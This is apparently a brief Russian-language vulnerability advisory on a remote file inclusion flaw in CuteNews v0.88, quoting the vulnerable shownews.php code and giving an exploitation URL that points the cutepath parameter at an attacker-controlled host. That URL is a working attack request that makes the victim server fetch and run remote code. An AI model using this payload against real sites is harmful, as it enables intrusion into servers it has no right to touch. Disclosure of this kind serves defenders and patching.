Вставка произвольного кода в CuteNews v0.88 

shownews.php : 

if(!$cutepath) $cutepath=».»; 
require_once(«$cutepath/config.php»); 
{………}
$all_news=file("$cutepath/news.txt");

Реализация:

http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/



Оставить мнение